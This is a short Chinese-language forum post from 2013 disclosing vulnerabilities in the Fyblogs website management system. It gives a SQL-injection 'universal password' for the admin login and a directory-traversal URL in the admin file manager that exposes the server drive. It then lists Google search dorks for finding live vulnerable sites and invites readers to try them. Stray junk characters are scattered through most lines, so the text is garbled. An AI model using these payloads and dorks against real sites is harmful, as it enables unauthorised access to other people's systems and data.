漏洞类型: 未授权访问/权限绕过6 q% U7 H4 B6 T
5 U- X( G2 R8 j2 e( ^简要描述:1 }' a3 O: \( w: y. \3 S
8 c1 k- X- O7 X. l% x4 kFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!4 k4 G7 X) \! h# k8 i0 l
6 E$ \8 p- L6 Z' L2 C; x
详细说明:
6 ~% s. i; @$ k- [1 F5 x+ h
& X$ G. G# w4 s2 D后台万能密码 'or'='or'
/ d4 y7 |% Y( n) S后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
@9 e% B* ?( {5 \admin/uploadfile.asp?currentFolder=/upfiles/../
5 T+ W2 v0 d% c, D4 _* s7 U7 H: a% u8 I, ?' g& c
漏洞证明:3 }4 h$ J/ ~0 J" {8 U! j
5 [ g( H6 t/ [' a
谷歌:inurl:type.asp?id=1 新闻中心
' L( H* |3 e7 |" t) c7 u或者 :inurl:download_ok.asp?
% i `6 J# g5 @( p7 K0 m/ U4 u
2 c/ f) P% v: E# o9 J1 ~$ G9 {可以测试
$ a7 l& s" D) U- J) o. `9 u$ A8 U* w
9 B" F+ Z T9 g- |0 i6 y7 P3 r |
发表于 2013-3-7 13:07:46
收藏
支持
反对